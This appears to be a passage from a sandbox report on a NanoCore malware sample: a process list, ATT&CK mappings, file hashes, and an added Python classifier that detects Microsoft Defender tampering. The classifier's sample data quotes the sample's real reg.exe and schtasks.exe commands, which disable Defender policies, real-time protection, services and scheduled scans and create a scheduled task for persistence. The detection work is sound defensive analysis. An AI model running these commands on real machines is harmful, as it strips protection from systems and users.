PID 3840 | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
PID 3904 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 3988 | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID 4104 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 2412 | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe | "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
PID 2284 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 4432 | C:\Windows\system32\backgroundTaskHost.exe | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
PID 4896 | C:\Windows\system32\backgroundTaskHost.exe | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
PID 1392 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 1404 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 1980 | C:\Windows\system32\backgroundTaskHost.exe | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
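The reg.exe and schtasks.exe children of cmd.exe in the tree above are a scripted Defender teardown (policy keys, real-time protection, cloud reporting, ETW autologgers, the SecurityHealth tray entry, the EPP shell extension and finally the Wd* services set to Start=4), and MsfUpdate.exe's schtasks /Create /XML from a temp file is the NanoCore persistence step. The Python below is an added example, not part of this report: it classifies such command lines by tokenising them with quoted spans kept whole, rather than substring-matching, so a key path with spaces or a switch in a different case still resolves correctly. The first seven sample command lines are copied from the process tree; the last two are constructed benign controls, and the category names and the Defender key list are my own.

```python
"""Classify reg.exe / schtasks.exe command lines for Defender tampering (added example)."""
import re

# Key paths whose modification removes or hides Microsoft Defender. Matched against
# "<key>\<value>" so the policy tree, the Wd* services, the ETW autologgers, the
# SecurityHealth Run entry and the EPP shell extension are all covered.
DEFENDER_TAMPER = re.compile(
    r"Policies\\Microsoft\\Windows Defender"
    r"|Autologger\\Defender\w*Logger"
    r"|Services\\(WinDefend|WdFilter|WdBoot|WdNisDrv|WdNisSvc)\b"
    r"|\\SecurityHealth$"
    r"|ContextMenuHandlers\\EPP$",
    re.IGNORECASE,
)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def tokens(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted spans whole and unquoting them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def switch(toks: list, name: str):
    """Value following a /switch (case-insensitive), or None when absent."""
    low = name.lower()
    for i in range(len(toks) - 1):
        if toks[i].lower() == low:
            return toks[i + 1]
    return None


def classify_cmdline(image: str, cmdline: str):
    """Return a dict describing the tampering a command line performs, or None."""
    toks = tokens(cmdline)
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "reg.exe" and len(toks) >= 3:
        verb, key = toks[1].lower(), toks[2]
        value = switch(toks, "/v")
        target = key + ("\\" + value if value else "")
        if verb in ("add", "delete") and DEFENDER_TAMPER.search(target):
            return {"kind": "defender_registry_tamper", "verb": verb,
                    "target": target, "data": switch(toks, "/d")}
    elif exe == "schtasks.exe":
        flags = {t.lower() for t in toks}
        task = switch(toks, "/tn") or ""
        if "/change" in flags and "/disable" in flags and task.lower().startswith("microsoft\\windows\\"):
            return {"kind": "builtin_task_disabled", "task": task}
        xml = switch(toks, "/xml")
        if "/create" in flags and xml and TEMP_DIR.search(xml):
            return {"kind": "task_from_temp_xml", "task": task, "xml": xml}
    return None


def triage(records) -> dict:
    """Count findings by kind over (image, cmdline) records."""
    counts = {}
    for image, cmdline in records:
        hit = classify_cmdline(image, cmdline)
        if hit:
            counts[hit["kind"]] = counts.get(hit["kind"], 0) + 1
    return counts


# (image, command line): the first seven are copied from this report's process tree,
# the last two are constructed benign controls that must not fire.
SAMPLE_CMDLINES = [
    (r"C:\Windows\system32\reg.exe", r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    (r"C:\Windows\system32\reg.exe", r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f'),
    (r"C:\Windows\system32\schtasks.exe", r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    (r"C:\Windows\SysWOW64\schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp269E.tmp"'),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKCU\Software\Contoso\App" /v "Theme" /t REG_SZ /d "dark" /f'),
    (r"C:\Windows\system32\schtasks.exe", r'schtasks /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"'),
]

if __name__ == "__main__":
    for image, cmdline in SAMPLE_CMDLINES:
        print(classify_cmdline(image, cmdline))
    print(triage(SAMPLE_CMDLINES))
```

Two points the classifier encodes that a plain string match would miss: the 32-bit MsfUpdate.exe spawns C:\Windows\SysWOW64\schtasks.exe while its command line names System32 (file-system redirection), so the image path, not the command line, identifies the binary; and the /TN prefix check keeps disabling of an organisation's own tasks out of the "built-in Defender task disabled" bucket.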
Network

MITRE ATT&CK Enterprise v15
Persistence
  Create or Modify System Process (1): Windows Service (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Create or Modify System Process (1): Windows Service (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Impair Defenses (4): Disable or Modify System Firewall (1), Disable or Modify Tools (3)
  Modify Registry (5)
Downloads

Filesize: 3KB
  MD5: 665f21a9b6730aa08e62473e481b8c55
  SHA1: 717d52e75ac16bf032299828dd61c86af281eb43
  SHA256: dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
  SHA512: b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

Filesize: 3.0MB
  MD5: ab43042da67bbac3ee18248ee40d4c7e
  SHA1: 10aa258234918a4231ee9a5c222f27c8a9a4d69d
  SHA256: fda0366362c09fe1538c6ccca5a67aba4ee3f15da38ba91276dcab13dc7ad4f1
  SHA512: b9657448c677ee458c63d09e05edcfdb0e92168155bc39b8c34092b17dd877232d99680fbf6e952b884dd294300d4f0c56ab6f93d07f506bc017f3988ef8538c

Filesize: 919KB
  MD5: a102b1ee34e498fb8458a6be30ba15e7
  SHA1: b586c1bc68a67b6fc7762d5ce7ecae8343d8e006
  SHA256: 0b533b19d6e78fdb0e9c7c3616da7641f3b8f9a2761da345efba417a15cc72c6
  SHA512: 0b49ce905e76f643019643e9ac42aaf31cdf50ed8294420a936ccce0eca0749d1baddb3c80a28a24ca6f91cd6ff044ec6dea9b4bd5e36c65341395199848483b

Filesize: 12.5MB
  MD5: d8865f463ff9f148fc62ca1a0e3db0fd
  SHA1: 1bdd1e03a7002261810ca0d39d785d53c2b2bb3c
  SHA256: fd56f3d15c22eacf304b5ecd000a39158f7dd43a139d22140f28d5d621fc1fc7
  SHA512: 83e01c03754a56b546514e8bd15d84fcf5c996f472189a492070d57edbadd16e07dc17180254508589f9b56221cbb24946bc6d281bb04a000f5375d9b6b7e937

Filesize: 1KB
  MD5: a7faa1243898bb160dc53c840f4e36a6
  SHA1: c599642d9e337523e4f1722f9dda85b9953b9145
  SHA256: f64544ba37b0287d951068172e8c2a5c7c75296e1a1ec0077af753bcf25d09d1
  SHA512: 8b90a2b38158b71bb1c55a80ca737f42297c2a58101c087ec34da270bbd2f7845c1d9140c08e1b68e79837a54b7184e5e1a83504ecc584a0074c3274a1df627e

Filesize: 14KB
  MD5: 325b008aec81e5aaa57096f05d4212b5
  SHA1: 27a2d89747a20305b6518438eff5b9f57f7df5c3
  SHA256: c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b
  SHA512: 18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf

Filesize: 5KB
  MD5: 9384f4007c492d4fa040924f31c00166
  SHA1: aba37faef30d7c445584c688a0b5638f5db31c7b
  SHA256: 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
  SHA512: 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

Filesize: 11KB
  MD5: c17103ae9072a06da581dec998343fc1
  SHA1: b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
  SHA256: dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
  SHA512: d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Filesize: 13KB
  MD5: 29858669d7da388d1e62b4fd5337af12
  SHA1: 756b94898429a9025a04ae227f060952f1149a5f
  SHA256: c24c005daa7f5578c4372b38d1be6be5e27ef3ba2cdb9b67fee15cac406eba62
  SHA512: 6f4d538f2fe0681f357bab73f633943c539ddc1451efa1d1bb76d70bb47aa68a05849e36ae405cc4664598a8194227fa7053de6dbce7d6c52a20301293b3c85f

Filesize: 4KB
  MD5: 7579ade7ae1747a31960a228ce02e666
  SHA1: 8ec8571a296737e819dcf86353a43fcf8ec63351
  SHA256: 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
  SHA512: a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

Filesize: 4KB
  MD5: d25102051b33f61c9f7fb564a4556219
  SHA1: c683964c11d5175171bd009cb08f87592c923f85
  SHA256: e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
  SHA512: 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

Filesize: 9KB
  MD5: c10e04dd4ad4277d5adc951bb331c777
  SHA1: b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
  SHA256: e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
  SHA512: 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

Filesize: 1KB
  MD5: d59570d1684c23b4ac8382a8ee20e096
  SHA1: a3027352e6ff1138652462936442d6ed03888826
  SHA256: 1ceb22ffeb0df77e03de3be0f94a348a71b9bf5001eec55a140a02d04f3cd16c
  SHA512: 7bbc949cecc0b12bee33ddbf435d1fd40f170142ee0de68441f35c4f71a126983ac44fb40c6efdc9d9913b8210142ee520bf6ebe7b1aa2b62897a57205d38a2b

Filesize: 257B
  MD5: 9ffdd056d650059d3a423a4948692cd1
  SHA1: b77f720c12e6d3114384b5a55a9a13c35019a62a
  SHA256: 80d69ec2f2b5906f27dbc752932ab45030b91cb4eefc34eb3354642b0fe9041e
  SHA512: 124e3df2202dfd3ae5d628e918092340c0ba4a2cfd3a61bb14d37f1eda87ebac2f2b74c95e55bdc2d2299b055a7e0aa6041211d663cd5f9b2e5eaee0410f8f43